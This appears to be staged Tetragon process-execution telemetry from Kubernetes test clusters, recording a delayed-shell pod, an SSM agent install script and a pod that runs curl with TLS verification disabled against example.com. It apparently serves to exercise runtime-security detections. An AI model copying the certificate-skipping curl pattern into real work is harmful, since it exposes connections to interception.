rootcwd","start_time":"2025-07-28T22:21:24.667485178Z","auid":4294967295,"parent_exec_id":"aXAtMTAtMC0xMC0yNTMudXMtd2VzdC0yLmNvbXB1dGUuaW50ZXJuYWw6NjAwMDAwMDA6MQ==","tid":2743,"in_init_tree":false},{"exec_id":"aXAtMTAtMC0xMC0yNTMudXMtd2VzdC0yLmNvbXB1dGUuaW50ZXJuYWw6NjAwMDAwMDA6MQ==","pid":1,"uid":0,"cwd":"/","binary":"/usr/lib/systemd/systemd","arguments":"--switched-root --system --deserialize 21","flags":"procFS auid rootcwd","start_time":"2025-07-28T22:21:07.527485203Z","auid":4294967295,"parent_exec_id":"aXAtMTAtMC0xMC0yNTMudXMtd2VzdC0yLmNvbXB1dGUuaW50ZXJuYWw6MTow","tid":1,"in_init_tree":false}]},"node_name":"ip-10-0-10-253.us-west-2.compute.internal","time":"2025-08-26T21:56:05.098281180Z","cluster_name":"isovalent-2","node_labels":{"alpha.eksctl.io/cluster-name":"isovalent-2","alpha.eksctl.io/instance-id":"i-0839d680c54ccef60","alpha.eksctl.io/nodegroup-name":"ng-default","beta.kubernetes.io/arch":"amd64","beta.kubernetes.io/instance-type":"t3.medium","beta.kubernetes.io/os":"linux","failure-domain.beta.kubernetes.io/region":"us-west-2","failure-domain.beta.kubernetes.io/zone":"us-west-2c","k8s.io/cloud-provider-aws":"480fc25a68b07748a13498c4eb5a2a07","kubernetes.io/arch":"amd64","kubernetes.io/hostname":"ip-10-0-10-253.us-west-2.compute.internal","kubernetes.io/os":"linux","node-lifecycle":"on-demand","node.kubernetes.io/instance-type":"t3.medium","topology.k8s.aws/zone-id":"usw2-az3","topology.kubernetes.io/region":"us-west-2","topology.kubernetes.io/zone":"us-west-2c"}}
{"process_exec":{"process":{"exec_id":"aXAtMTAtMC0xMC0yNTMudXMtd2VzdC0yLmNvbXB1dGUuaW50ZXJuYWw6MjUwNDA5NzYzMDI3NDc0NTo2MDQ2MzU=","pid":604635,"uid":0,"cwd":"/","binary":"/bin/date","flags":"execve rootcwd clone inInitTree","start_time":"2025-08-26T21:56:05.097760389Z","auid":4294967295,"pod":{"namespace":"default","name":"delayed-shell","container":{"id":"containerd://c48fd368771bb4ee42b6c5349e87ff834be06d96452d3b2041a8a000b9d6395f","name":"delayed-shell","image":{"id":"docker.io/library/alpine@sha256:4bcff63911fcb4448bd4fdacec207030997caf25e9bea4045fa6c8c44de311d1","name":"docker.io/library/alpine:3"},"start_time":"2025-08-26T21:50:05Z","pid":8,"security_context":{}},"pod_labels":{"run":"delayed-shell"},"workload":"delayed-shell","workload_kind":"Pod"},"docker":"c48fd368771bb4ee42b6c5349e87ff8","parent_exec_id":"aXAtMTAtMC0xMC0yNTMudXMtd2VzdC0yLmNvbXB1dGUuaW50ZXJuYWw6MjUwMzczNzYyNTA1NDgxMjo2MDI3MjY=","tid":604635,"in_init_tree":true},"parent":{"exec_id":"aXAtMTAtMC0xMC0yNTMudXMtd2VzdC0yLmNvbXB1dGUuaW50ZXJuYWw6MjUwMzczNzYyNTA1NDgxMjo2MDI3MjY=","pid":602726,"uid":0,"cwd":"/","binary":"/bin/sh","arguments":"-lc \"echo \"started\"; sleep 360; /bin/sh -lc \"echo late shell $(date)\"; sleep 5\"","flags":"execve rootcwd clone inInitTree","start_time":"2025-08-26T21:50:05.092540977Z","auid":4294967295,"pod":{"namespace":"default","name":"delayed-shell","container":{"id":"containerd://c48fd368771bb4ee42b6c5349e87ff834be06d96452d3b2041a8a000b9d6395f","name":"delayed-shell","image":{"id":"docker.io/library/alpine@sha256:4bcff63911fcb4448bd4fdacec207030997caf25e9bea4045fa6c8c44de311d1","name":"docker.io/library/alpine:3"},"start_time":"2025-08-26T21:50:05Z","pid":1,"security_context":{}},"pod_labels":{"run":"delayed-shell"},"workload":"delayed-shell","workload_kind":"Pod"},"docker":"c48fd368771bb4ee42b6c5349e87ff8","parent_exec_id":"aXAtMTAtMC0xMC0yNTMudXMtd2VzdC0yLmNvbXB1dGUuaW50ZXJuYWw6MjUwMzczNzQ2NDMyODQ0OTo2MDI2Njk=","tid":602726,"in_init_tree":true},"ancestors":[{"exec_id":"aXAtMTAtMC0xMC0yNTMudXMtd2VzdC0yLmNvbXB1dGUuaW50ZXJuYWw6MjUwMzczNzQ2NDMyODQ0OTo2MDI2Njk=","pid":602669,"uid":0,"cwd":"/run/containerd/io.containerd.runtime.v2.task/k8s.io/3489e42874ecaf13fe2908d3ab2a5d0cae7ff7941b97c353285a3fd0b294354e","binary":"/usr/bin/containerd-shim-runc-v2","arguments":"-namespace k8s.io -id 3489e42874ecaf13fe2908d3ab2a5d0cae7ff7941b97c353285a3fd0b294354e -address /run/containerd/containerd.sock","flags":"execve clone","start_time":"2025-08-26T21:50:04.931814297Z","auid":4294967295,"parent_exec_id":"aXAtMTAtMC0xMC0yNTMudXMtd2VzdC0yLmNvbXB1dGUuaW50ZXJuYWw6MjUwMzczNzQ1NzUwNTUwNTo2MDI2NjA=","tid":602669,"in_init_tree":false},{"exec_id":"aXAtMTAtMC0xMC0yNTMudXMtd2VzdC0yLmNvbXB1dGUuaW50ZXJuYWw6MjUwMzczNzQ1NzUwNTUwNTo2MDI2NjA=","pid":602660,"uid":0,"cwd":"/run/containerd/io.containerd.runtime.v2.task/k8s.io/3489e42874ecaf13fe2908d3ab2a5d0cae7ff7941b97c353285a3fd0b294354e","binary":"/usr/bin/containerd-shim-runc-v2","arguments":"-namespace k8s.io -address /run/containerd/containerd.sock -publish-binary /usr/bin/containerd -id 3489e42874ecaf13fe2908d3ab2a5d0cae7ff7941b97c353285a3fd0b294354e start","flags":"execve clone","start_time":"2025-08-26T21:50:04.924990706Z","auid":4294967295,"parent_exec_id":"aXAtMTAtMC0xMC0yNTMudXMtd2VzdC0yLmNvbXB1dGUuaW50ZXJuYWw6MTcyMDAwMDAwMDA6Mjc0Mw==","tid":602660,"in_init_tree":false},{"exec_id":"aXAtMTAtMC0xMC0yNTMudXMtd2VzdC0yLmNvbXB1dGUuaW50ZXJuYWw6MTcyMDAwMDAwMDA6Mjc0Mw==","pid":2743,"uid":0,"cwd":"/","binary":"/usr/bin/containerd","flags":"procFS auid rootcwd","start_time":"2025-07-28T22:21:24.667485178Z","auid":4294967295,"parent_exec_id":"aXAtMTAtMC0xMC0yNTMudXMtd2VzdC0yLmNvbXB1dGUuaW50ZXJuYWw6NjAwMDAwMDA6MQ==","tid":2743,"in_init_tree":false},{"exec_id":"aXAtMTAtMC0xMC0yNTMudXMtd2VzdC0yLmNvbXB1dGUuaW50ZXJuYWw6NjAwMDAwMDA6MQ==","pid":1,"uid":0,"cwd":"/","binary":"/usr/lib/systemd/systemd","arguments":"--switched-root --system --deserialize 21","flags":"procFS auid rootcwd","start_time":"2025-07-28T22:21:07.527485203Z","auid":4294967295,"parent_exec_id":"aXAtMTAtMC0xMC0yNTMudXMtd2VzdC0yLmNvbXB1dGUuaW50ZXJuYWw6MTow","tid":1,"in_init_tree":false}]},"node_name":"ip-10-0-10-253.us-west-2.compute.internal","time":"2025-08-26T21:56:05.097759904Z","cluster_name":"isovalent-2","node_labels":{"alpha.eksctl.io/cluster-name":"isovalent-2","alpha.eksctl.io/instance-id":"i-0839d680c54ccef60","alpha.eksctl.io/nodegroup-name":"ng-default","beta.kubernetes.io/arch":"amd64","beta.kubernetes.io/instance-type":"t3.medium","beta.kubernetes.io/os":"linux","failure-domain.beta.kubernetes.io/region":"us-west-2","failure-domain.beta.kubernetes.io/zone":"us-west-2c","k8s.io/cloud-provider-aws":"480fc25a68b07748a13498c4eb5a2a07","kubernetes.io/arch":"amd64","kubernetes.io/hostname":"ip-10-0-10-253.us-west-2.compute.internal","kubernetes.io/os":"linux","node-lifecycle":"on-demand","node.kubernetes.io/instance-type":"t3.medium","topology.k8s.aws/zone-id":"usw2-az3","topology.kubernetes.io/region":"us-west-2","topology.kubernetes.io/zone":"us-west-2c"}}
{"process_exec":{"process":{"exec_id":"aXAtMTAtMC0xMC0yNTMudXMtd2VzdC0yLmNvbXB1dGUuaW50ZXJuYWw6MjUwMzczNzYyOTM2MzY1ODo2MDI3NDA=","pid":602740,"uid":0,"cwd":"/","binary":"/bin/sleep","arguments":"360","flags":"execve rootcwd clone inInitTree","start_time":"2025-08-26T21:50:05.096849482Z","auid":4294967295,"pod":{"namespace":"default","name":"delayed-shell","container":{"id":"containerd://c48fd368771bb4ee42b6c5349e87ff834be06d96452d3b2041a8a000b9d6395f","name":"delayed-shell","image":{"id":"docker.io/library/alpine@sha256:4bcff63911fcb4448bd4fdacec207030997caf25e9bea4045fa6c8c44de311d1","name":"docker.io/library/alpine:3"},"start_time":"2025-08-26T21:50:05Z","pid":7,"security_context":{}},"pod_labels":{"run":"delayed-shell"},"workload":"delayed-shell","workload_kind":"Pod"},"docker":"c48fd368771bb4ee42b6c5349e87ff8","parent_exec_id":"aXAtMTAtMC0xMC0yNTMudXMtd2VzdC0yLmNvbXB1dGUuaW50ZXJuYWw6MjUwMzczNzYyNTA1NDgxMjo2MDI3MjY=","tid":602740,"in_init_tree":true},"parent":{"exec_id":"aXAtMTAtMC0xMC0yNTMudXMtd2VzdC0yLmNvbXB1dGUuaW50ZXJuYWw6MjUwMzczNzYyNTA1NDgxMjo2MDI3MjY=","pid":602726,"uid":0,"cwd":"/","binary":"/bin/sh","arguments":"-lc \"echo \"started\"; sleep 360; /bin/sh -lc \"echo late shell $(date)\"; sleep 5\"","flags":"execve rootcwd clone inInitTree","start_time":"2025-08-26T21:50:05.092540977Z","auid":4294967295,"pod":{"namespace":"default","name":"delayed-shell","container":{"id":"containerd://c48fd368771bb4ee42b6c5349e87ff834be06d96452d3b2041a8a000b9d6395f","name":"delayed-shell","image":{"id":"docker.io/library/alpine@sha256:4bcff63911fcb4448bd4fdacec207030997caf25e9bea4045fa6c8c44de311d1","name":"docker.io/library/alpine:3"},"start_time":"2025-08-26T21:50:05Z","pid":1,"security_context":{}},"pod_labels":{"run":"delayed-shell"},"workload":"delayed-shell","workload_kind":"Pod"},"docker":"c48fd368771bb4ee42b6c5349e87ff8","parent_exec_id":"aXAtMTAtMC0xMC0yNTMudXMtd2VzdC0yLmNvbXB1dGUuaW50ZXJuYWw6MjUwMzczNzQ2NDMyODQ0OTo2MDI2Njk=","tid":602726,"in_init_tree":true},"ancestors":[{"exec_id":"aXAtMTAtMC0xMC0yNTMudXMtd2VzdC0yLmNvbXB1dGUuaW50ZXJuYWw6MjUwMzczNzQ2NDMyODQ0OTo2MDI2Njk=","pid":602669,"uid":0,"cwd":"/run/containerd/io.containerd.runtime.v2.task/k8s.io/3489e42874ecaf13fe2908d3ab2a5d0cae7ff7941b97c353285a3fd0b294354e","binary":"/usr/bin/containerd-shim-runc-v2","arguments":"-namespace k8s.io -id 3489e42874ecaf13fe2908d3ab2a5d0cae7ff7941b97c353285a3fd0b294354e -address /run/containerd/containerd.sock","flags":"execve clone","start_time":"2025-08-26T21:50:04.931814297Z","auid":4294967295,"parent_exec_id":"aXAtMTAtMC0xMC0yNTMudXMtd2VzdC0yLmNvbXB1dGUuaW50ZXJuYWw6MjUwMzczNzQ1NzUwNTUwNTo2MDI2NjA=","tid":602669,"in_init_tree":false},{"exec_id":"aXAtMTAtMC0xMC0yNTMudXMtd2VzdC0yLmNvbXB1dGUuaW50ZXJuYWw6MjUwMzczNzQ1NzUwNTUwNTo2MDI2NjA=","pid":602660,"uid":0,"cwd":"/run/containerd/io.containerd.runtime.v2.task/k8s.io/3489e42874ecaf13fe2908d3ab2a5d0cae7ff7941b97c353285a3fd0b294354e","binary":"/usr/bin/containerd-shim-runc-v2","arguments":"-namespace k8s.io -address /run/containerd/containerd.sock -publish-binary /usr/bin/containerd -id 3489e42874ecaf13fe2908d3ab2a5d0cae7ff7941b97c353285a3fd0b294354e start","flags":"execve clone","start_time":"2025-08-26T21:50:04.924990706Z","auid":4294967295,"parent_exec_id":"aXAtMTAtMC0xMC0yNTMudXMtd2VzdC0yLmNvbXB1dGUuaW50ZXJuYWw6MTcyMDAwMDAwMDA6Mjc0Mw==","tid":602660,"in_init_tree":false},{"exec_id":"aXAtMTAtMC0xMC0yNTMudXMtd2VzdC0yLmNvbXB1dGUuaW50ZXJuYWw6MTcyMDAwMDAwMDA6Mjc0Mw==","pid":2743,"uid":0,"cwd":"/","binary":"/usr/bin/containerd","flags":"procFS auid rootcwd","start_time":"2025-07-28T22:21:24.667485178Z","auid":4294967295,"parent_exec_id":"aXAtMTAtMC0xMC0yNTMudXMtd2VzdC0yLmNvbXB1dGUuaW50ZXJuYWw6NjAwMDAwMDA6MQ==","tid":2743,"in_init_tree":false},{"exec_id":"aXAtMTAtMC0xMC0yNTMudXMtd2VzdC0yLmNvbXB1dGUuaW50ZXJuYWw6NjAwMDAwMDA6MQ==","pid":1,"uid":0,"cwd":"/","binary":"/usr/lib/systemd/systemd","arguments":"--switched-root --system --deserialize 21","flags":"procFS auid rootcwd","start_time":"2025-07-28T22:21:07.527485203Z","auid":4294967295,"parent_exec_id":"aXAtMTAtMC0xMC0yNTMudXMtd2VzdC0yLmNvbXB1dGUuaW50ZXJuYWw6MTow","tid":1,"in_init_tree":false}]},"node_name":"ip-10-0-10-253.us-west-2.compute.internal","time":"2025-08-26T21:50:05.096848913Z","cluster_name":"isovalent-2","node_labels":{"alpha.eksctl.io/cluster-name":"isovalent-2","alpha.eksctl.io/instance-id":"i-0839d680c54ccef60","alpha.eksctl.io/nodegroup-name":"ng-default","beta.kubernetes.io/arch":"amd64","beta.kubernetes.io/instance-type":"t3.medium","beta.kubernetes.io/os":"linux","failure-domain.beta.kubernetes.io/region":"us-west-2","failure-domain.beta.kubernetes.io/zone":"us-west-2c","k8s.io/cloud-provider-aws":"480fc25a68b07748a13498c4eb5a2a07","kubernetes.io/arch":"amd64","kubernetes.io/hostname":"ip-10-0-10-253.us-west-2.compute.internal","kubernetes.io/os":"linux","node-lifecycle":"on-demand","node.kubernetes.io/instance-type":"t3.medium","topology.k8s.aws/zone-id":"usw2-az3","topology.kubernetes.io/region":"us-west-2","topology.kubernetes.io/zone":"us-west-2c"}}
{"process_exec":{"process":{"exec_id":"aXAtMTAtMC0xMC0yNTMudXMtd2VzdC0yLmNvbXB1dGUuaW50ZXJuYWw6MjUwMzczNzYyNTA1NDgxMjo2MDI3MjY=","pid":602726,"uid":0,"cwd":"/","binary":"/bin/sh","arguments":"-lc \"echo \"started\"; sleep 360; /bin/sh -lc \"echo late shell $(date)\"; sleep 5\"","flags":"execve rootcwd clone inInitTree","start_time":"2025-08-26T21:50:05.092540977Z","auid":4294967295,"pod":{"namespace":"default","name":"delayed-shell","container":{"id":"containerd://c48fd368771bb4ee42b6c5349e87ff834be06d96452d3b2041a8a000b9d6395f","name":"delayed-shell","image":{"id":"docker.io/library/alpine@sha256:4bcff63911fcb4448bd4fdacec207030997caf25e9bea4045fa6c8c44de311d1","name":"docker.io/library/alpine:3"},"start_time":"2025-08-26T21:50:05Z","pid":1,"security_context":{}},"pod_labels":{"run":"delayed-shell"},"workload":"delayed-shell","workload_kind":"Pod"},"docker":"c48fd368771bb4ee42b6c5349e87ff8","parent_exec_id":"aXAtMTAtMC0xMC0yNTMudXMtd2VzdC0yLmNvbXB1dGUuaW50ZXJuYWw6MjUwMzczNzQ2NDMyODQ0OTo2MDI2Njk=","tid":602726,"in_init_tree":true},"parent":{"exec_id":"aXAtMTAtMC0xMC0yNTMudXMtd2VzdC0yLmNvbXB1dGUuaW50ZXJuYWw6MjUwMzczNzQ2NDMyODQ0OTo2MDI2Njk=","pid":602669,"uid":0,"cwd":"/run/containerd/io.containerd.runtime.v2.task/k8s.io/3489e42874ecaf13fe2908d3ab2a5d0cae7ff7941b97c353285a3fd0b294354e","binary":"/usr/bin/containerd-shim-runc-v2","arguments":"-namespace k8s.io -id 3489e42874ecaf13fe2908d3ab2a5d0cae7ff7941b97c353285a3fd0b294354e -address /run/containerd/containerd.sock","flags":"execve clone","start_time":"2025-08-26T21:50:04.931814297Z","auid":4294967295,"parent_exec_id":"aXAtMTAtMC0xMC0yNTMudXMtd2VzdC0yLmNvbXB1dGUuaW50ZXJuYWw6MjUwMzczNzQ1NzUwNTUwNTo2MDI2NjA=","tid":602669,"in_init_tree":false},"ancestors":[{"exec_id":"aXAtMTAtMC0xMC0yNTMudXMtd2VzdC0yLmNvbXB1dGUuaW50ZXJuYWw6MjUwMzczNzQ1NzUwNTUwNTo2MDI2NjA=","pid":602660,"uid":0,"cwd":"/run/containerd/io.containerd.runtime.v2.task/k8s.io/3489e42874ecaf13fe2908d3ab2a5d0cae7ff7941b97c353285a3fd0b294354e","binary":"/usr/bin/containerd-shim-runc-v2","arguments":"-namespace k8s.io -address /run/containerd/containerd.sock -publish-binary /usr/bin/containerd -id 3489e42874ecaf13fe2908d3ab2a5d0cae7ff7941b97c353285a3fd0b294354e start","flags":"execve clone","start_time":"2025-08-26T21:50:04.924990706Z","auid":4294967295,"parent_exec_id":"aXAtMTAtMC0xMC0yNTMudXMtd2VzdC0yLmNvbXB1dGUuaW50ZXJuYWw6MTcyMDAwMDAwMDA6Mjc0Mw==","tid":602660,"in_init_tree":false},{"exec_id":"aXAtMTAtMC0xMC0yNTMudXMtd2VzdC0yLmNvbXB1dGUuaW50ZXJuYWw6MTcyMDAwMDAwMDA6Mjc0Mw==","pid":2743,"uid":0,"cwd":"/","binary":"/usr/bin/containerd","flags":"procFS auid rootcwd","start_time":"2025-07-28T22:21:24.667485178Z","auid":4294967295,"parent_exec_id":"aXAtMTAtMC0xMC0yNTMudXMtd2VzdC0yLmNvbXB1dGUuaW50ZXJuYWw6NjAwMDAwMDA6MQ==","tid":2743,"in_init_tree":false},{"exec_id":"aXAtMTAtMC0xMC0yNTMudXMtd2VzdC0yLmNvbXB1dGUuaW50ZXJuYWw6NjAwMDAwMDA6MQ==","pid":1,"uid":0,"cwd":"/","binary":"/usr/lib/systemd/systemd","arguments":"--switched-root --system --deserialize 21","flags":"procFS auid rootcwd","start_time":"2025-07-28T22:21:07.527485203Z","auid":4294967295,"parent_exec_id":"aXAtMTAtMC0xMC0yNTMudXMtd2VzdC0yLmNvbXB1dGUuaW50ZXJuYWw6MTow","tid":1,"in_init_tree":false}]},"node_name":"ip-10-0-10-253.us-west-2.compute.internal","time":"2025-08-26T21:50:05.092540845Z","cluster_name":"isovalent-2","node_labels":{"alpha.eksctl.io/cluster-name":"isovalent-2","alpha.eksctl.io/instance-id":"i-0839d680c54ccef60","alpha.eksctl.io/nodegroup-name":"ng-default","beta.kubernetes.io/arch":"amd64","beta.kubernetes.io/instance-type":"t3.medium","beta.kubernetes.io/os":"linux","failure-domain.beta.kubernetes.io/region":"us-west-2","failure-domain.beta.kubernetes.io/zone":"us-west-2c","k8s.io/cloud-provider-aws":"480fc25a68b07748a13498c4eb5a2a07","kubernetes.io/arch":"amd64","kubernetes.io/hostname":"ip-10-0-10-253.us-west-2.compute.internal","kubernetes.io/os":"linux","node-lifecycle":"on-demand","node.kubernetes.io/instance-type":"t3.medium","topology.k8s.aws/zone-id":"usw2-az3","topology.kubernetes.io/region":"us-west-2","topology.kubernetes.io/zone":"us-west-2c"}}
{"process_exec":{"process":{"exec_id":"aXAtMTkyLTE2OC04OS02NC51cy13ZXN0LTIuY29tcHV0ZS5pbnRlcm5hbDo5NTEzNDkyOTg2ODQxNTU6NjgwODUz","pid":680853,"uid":101,"cwd":"/home/curl_user","binary":"/usr/bin/curl","arguments":"-ks https://example.com","flags":"execve inInitTree","start_time":"2025-09-16T19:22:55.731901485Z","auid":4294967295,"pod":{"namespace":"default","name":"curl-insec-k","container":{"id":"containerd://c79003861e161f248c3315659fab56c483eff9b8697dd9dedefa76188cd99f32","name":"curl-insec-k","image":{"id":"docker.io/curlimages/curl@sha256:463eaf6072688fe96ac64fa623fe73e1dbe25d8ad6c34404a669ad3ce1f104b6","name":"docker.io/curlimages/curl:latest"},"pid":1,"security_context":{}},"pod_labels":{"run":"curl-insec-k"},"workload":"curl-insec-k","workload_kind":"Pod"},"docker":"c79003861e161f248c3315659fab56c","parent_exec_id":"aXAtMTkyLTE2OC04OS02NC51cy13ZXN0LTIuY29tcHV0ZS5pbnRlcm5hbDo5NTEzNDkyOTc3MDcwNTE6NjgwODUz","tid":680853,"in_init_tree":true},"parent":{"exec_id":"aXAtMTkyLTE2OC04OS02NC51cy13ZXN0LTIuY29tcHV0ZS5pbnRlcm5hbDo5NTEzNDkyOTc3MDcwNTE6NjgwODUz","pid":680853,"uid":101,"cwd":"/home/curl_user","binary":"/entrypoint.sh","arguments":"/entrypoint.sh curl -ks https://example.com","flags":"execve clone inInitTree","start_time":"2025-09-16T19:22:55.730924668Z","auid":4294967295,"pod":{"namespace":"default","name":"curl-insec-k","container":{"id":"containerd://c79003861e161f248c3315659fab56c483eff9b8697dd9dedefa76188cd99f32","name":"curl-insec-k","image":{"id":"docker.io/curlimages/curl@sha256:463eaf6072688fe96ac64fa623fe73e1dbe25d8ad6c34404a669ad3ce1f104b6","name":"docker.io/curlimages/curl:latest"},"pid":1,"security_context":{}},"pod_labels":{"run":"curl-insec-k"},"workload":"curl-insec-k","workload_kind":"Pod"},"docker":"c79003861e161f248c3315659fab56c","parent_exec_id":"aXAtMTkyLTE2OC04OS02NC51cy13ZXN0LTIuY29tcHV0ZS5pbnRlcm5hbDo5NTEzNDY4MDgxMDg0ODI6NjgwNzc4","tid":680853,"in_init_tree":true},"ancestors":[{"exec_id":"aXAtMTkyLTE2OC04OS02NC51cy13ZXN0LTIuY29tcHV0ZS5pbnRlcm5hbDo5NTEzNDY4MDgxMDg0ODI6NjgwNzc4","pid":680778,"uid":0,"cwd":"/run/containerd/io.containerd.runtime.v2.task/k8s.io/1df50f38af0579a4d9649e7fc55589450a216cd47ce2dcdd1cd55f64cc1ca9f2","binary":"/usr/bin/containerd-shim-runc-v2","arguments":"-namespace k8s.io -id 1df50f38af0579a4d9649e7fc55589450a216cd47ce2dcdd1cd55f64cc1ca9f2 -address /run/containerd/containerd.sock","flags":"execve clone","start_time":"2025-09-16T19:22:53.241325697Z","auid":4294967295,"parent_exec_id":"aXAtMTkyLTE2OC04OS02NC51cy13ZXN0LTIuY29tcHV0ZS5pbnRlcm5hbDo5NTEzNDY3OTk3ODc4Mjc6NjgwNzcw","tid":680778,"in_init_tree":false},{"exec_id":"aXAtMTkyLTE2OC04OS02NC51cy13ZXN0LTIuY29tcHV0ZS5pbnRlcm5hbDo5NTEzNDY3OTk3ODc4Mjc6NjgwNzcw","pid":680770,"uid":0,"cwd":"/run/containerd/io.containerd.runtime.v2.task/k8s.io/1df50f38af0579a4d9649e7fc55589450a216cd47ce2dcdd1cd55f64cc1ca9f2","binary":"/usr/bin/containerd-shim-runc-v2","arguments":"-namespace k8s.io -address /run/containerd/containerd.sock -publish-binary /usr/bin/containerd -id 1df50f38af0579a4d9649e7fc55589450a216cd47ce2dcdd1cd55f64cc1ca9f2 start","flags":"execve clone","start_time":"2025-09-16T19:22:53.233004968Z","auid":4294967295,"parent_exec_id":"aXAtMTkyLTE2OC04OS02NC51cy13ZXN0LTIuY29tcHV0ZS5pbnRlcm5hbDoxMTk5MDAwMDAwMDoxNjI4","tid":680770,"in_init_tree":false},{"exec_id":"aXAtMTkyLTE2OC04OS02NC51cy13ZXN0LTIuY29tcHV0ZS5pbnRlcm5hbDoxMTk5MDAwMDAwMDoxNjI4","pid":1628,"uid":0,"cwd":"/","binary":"/usr/bin/containerd","flags":"procFS auid rootcwd","start_time":"2025-09-05T19:07:18.423217035Z","auid":4294967295,"parent_exec_id":"aXAtMTkyLTE2OC04OS02NC51cy13ZXN0LTIuY29tcHV0ZS5pbnRlcm5hbDowOjE=","tid":1628,"in_init_tree":false},{"exec_id":"aXAtMTkyLTE2OC04OS02NC51cy13ZXN0LTIuY29tcHV0ZS5pbnRlcm5hbDowOjE=","pid":1,"uid":0,"cwd":"/","binary":"/usr/lib/systemd/systemd","arguments":"--switched-root --system --deserialize=32","flags":"procFS auid rootcwd","start_time":"2025-09-05T19:07:06.433217108Z","auid":4294967295,"parent_exec_id":"aXAtMTkyLTE2OC04OS02NC51cy13ZXN0LTIuY29tcHV0ZS5pbnRlcm5hbDoxOjA=","tid":1,"in_init_tree":false}]},"node_name":"ip-192-168-89-64.us-west-2.compute.internal","time":"2025-09-16T19:22:55.731901206Z","cluster_name":"k8s-goat-cluster","node_labels":{"alpha.eksctl.io/cluster-name":"k8s-goat-cluster","alpha.eksctl.io/nodegroup-name":"ng-a99d40b1","beta.kubernetes.io/arch":"arm64","beta.kubernetes.io/instance-type":"t4g.medium","beta.kubernetes.io/os":"linux","eks.amazonaws.com/capacityType":"ON_DEMAND","eks.amazonaws.com/nodegroup":"ng-a99d40b1","eks.amazonaws.com/nodegroup-image":"ami-0339636baccc3c183","eks.amazonaws.com/sourceLaunchTemplateId":"lt-0da0169006f2a7c39","eks.amazonaws.com/sourceLaunchTemplateVersion":"1","failure-domain.beta.kubernetes.io/region":"us-west-2","failure-domain.beta.kubernetes.io/zone":"us-west-2c","k8s.io/cloud-provider-aws":"16c540d8ecc5192189b6444fb194814b","kubernetes.io/arch":"arm64","kubernetes.io/hostname":"ip-192-168-89-64.us-west-2.compute.internal","kubernetes.io/os":"linux","node.kubernetes.io/instance-type":"t4g.medium","topology.k8s.aws/zone-id":"usw2-az3","topology.kubernetes.io/region":"us-west-2","topology.kubernetes.io/zone":"us-west-2c"}}
{"process_exec":{"process":{"exec_id":"aXAtMTkyLTE2OC04OS02NC51cy13ZXN0LTIuY29tcHV0ZS5pbnRlcm5hbDo5NDgxMDcwMzYxODY3NDI6NjY0MTk3","pid":664197,"uid":0,"cwd":"/usr/bin","binary":"/usr/bin/sh","arguments":"-c /var/lib/amazon/ssm/i-0b81ef692f3820dfb/document/orchestration/a64702f9-22d8-4818-955d-c3f91e40b28e/installLinuxAgents/_script.sh","flags":"execve clone","start_time":"2025-09-16T18:28:53.469403792Z","auid":4294967295,"parent_exec_id":"aXAtMTkyLTE2OC04OS02NC51cy13ZXN0LTIuY29tcHV0ZS5pbnRlcm5hbDo5NDgxMDY4NTMwMTQyMjM6NjY0MTkw","tid":664197,"in_init_tree":false},"parent":{"exec_id":"aXAtMTkyLTE2OC04OS02NC51cy13ZXN0LTIuY29tcHV0ZS5pbnRlcm5hbDo5NDgxMDY4NTMwMTQyMjM6NjY0MTkw","pid":664190,"uid":0,"cwd":"/usr/bin","binary":"/usr/bin/ssm-document-worker","arguments":"a64702f9-22d8-4818-955d-c3f91e40b28e","flags":"execve clone","start_time":"2025-09-16T18:28:53.286231373Z","auid":4294967295,"parent_exec_id":"aXAtMTkyLTE2OC04OS02NC51cy13ZXN0LTIuY29tcHV0ZS5pbnRlcm5hbDo3MTA4OTgzODA2MjozNTEw","tid":664190,"in_init_tree":false},"ancestors":[{"exec_id":"aXAtMTkyLTE2OC04OS02NC51cy13ZXN0LTIuY29tcHV0ZS5pbnRlcm5hbDo3MTA4OTgzODA2MjozNTEw","pid":3510,"uid":0,"cwd":"/usr/bin","binary":"/usr/bin/ssm-agent-worker","flags":"execve clone","start_time":"2025-09-05T19:08:17.523055055Z","auid":4294967295,"parent_exec_id":"aXAtMTkyLTE2OC04OS02NC51cy13ZXN0LTIuY29tcHV0ZS5pbnRlcm5hbDo3MDAyMzgyNzQzNTozNDM2","tid":3510,"in_init_tree":false},{"exec_id":"aXAtMTkyLTE2OC04OS02NC51cy13ZXN0LTIuY29tcHV0ZS5pbnRlcm5hbDo3MDAyMzgyNzQzNTozNDM2","pid":3436,"uid":0,"cwd":"/usr/bin","binary":"/usr/bin/amazon-ssm-agent","flags":"execve clone","start_time":"2025-09-05T19:08:16.457045807Z","auid":4294967295,"parent_exec_id":"aXAtMTkyLTE2OC04OS02NC51cy13ZXN0LTIuY29tcHV0ZS5pbnRlcm5hbDozOTUzMzQzODExNjox","tid":3436,"in_init_tree":false}]},"node_name":"ip-192-168-89-64.us-west-2.compute.internal","time":"2025-09-16T18:28:53.469403752Z","cluster_name":"k8s-goat-cluster","node_labels":{"alpha.eksctl.io/cluster-name":"k8s-goat-cluster","alpha.eksctl.io/nodegroup-name":"ng-a99d40b1","beta.kubernetes.io/arch":"arm64","beta.kubernetes.io/instance-type":"t4g.medium","beta.kubernetes.io/os":"linux","eks.amazonaws.com/capacityType":"ON_DEMAND","eks.amazonaws.com/nodegroup":"ng-a99d40b1","eks.amazonaws.com/nodegroup-image":"ami-0339636baccc3c183","eks.amazonaws.com/sourceLaunchTemplateId":"lt-0da0169006f2a7c39","eks.amazonaws.com/sourceLaunchTemplateVersion":"1","failure-domain.beta.kubernetes.io/region":"us-west-2","failure-domain.beta.kubernetes.io/zone":"us-west-2c","k8s.io/cloud-provider-aws":"16c540d8ecc5192189b6444fb194814b","kubernetes.io/arch":"arm64","kubernetes.io/hostname":"ip-192-168-89-64.us-west-2.compute.internal","kubernetes.io/os":"linux","node.kubernetes.io/instance-type":"t4g.medium","topology.k8s.aws/zone-id":"usw2-az3","topology.kubernetes.io/region":"us-west-2","topology.kubernetes.io/zone":"us-west-2c"}}
